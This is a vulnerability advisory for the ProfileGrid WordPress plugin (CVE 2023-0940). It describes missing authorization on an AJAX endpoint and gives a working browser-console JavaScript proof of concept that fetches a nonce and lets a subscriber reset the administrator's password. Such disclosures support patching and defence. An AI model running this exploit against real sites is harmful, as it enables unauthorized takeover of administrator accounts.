ProfileGrid < 5.3.1 – Subscriber+ Arbitrary Password Reset | CVE 2023-0940

Description

The plugin provides an AJAX endpoint for resetting a user password but does not implement proper authorization. This allows a user with low privileges, such as subscriber, to change the password of any account, including Administrator ones.

Proof of Concept

1. Create an administrator account and a subscriber account. If the administrator account ID is not 1, change the `user_id` field accordingly in the code below.
2. Sign in as the subscriber user, and run the following code in your browser console. This will change the administrator's account password to well_nice

// The first request is required to obtain the password reset nonce.
fetch( 
    '/wp-admin/admin-ajax.php', 
    {
        method:'POST', 
        headers: {'Content-Type': 'application/x-www-form-urlencoded'}, 
        body: 'action=pm_edit_group_popup_html&tab=member&type=reset_password'
    } 
).then( 
    rsp => { 
        if ( ! rsp.ok ) {
            alert( 'Failed to fetch reset nonce' )
        } else{
            return rsp.text();
        } 
    }
).then( 
    data => { 
        // Extracts the nonce from the first request
        nonceString='name="_wpnonce" value="';
        nonceStart= data.indexOf( nonceString )+nonceString.length;
        nonce = data.substring( nonceStart, nonceStart+10 ); 
        // Sends the password reset request
        fetch( 
            '/wp-admin/admin-ajax.php',
            {
                method: 'POST',
                headers: {'Content-Type': 'application/x-www-form-urlencoded'},
                body: 'action=pm_reset_user_password&_wpnonce=' + nonce + '&user_id=1&pm_new_pass=well_nice'
            }
        ).then(
            rsp => {
                if ( ! rsp.ok ) {
                    alert( 'Failed to reset password' );
                } else {
                    return rsp.text();
                }
            }
        ).then(
            data => {
                console.log( data );
            }
        )
    } 
);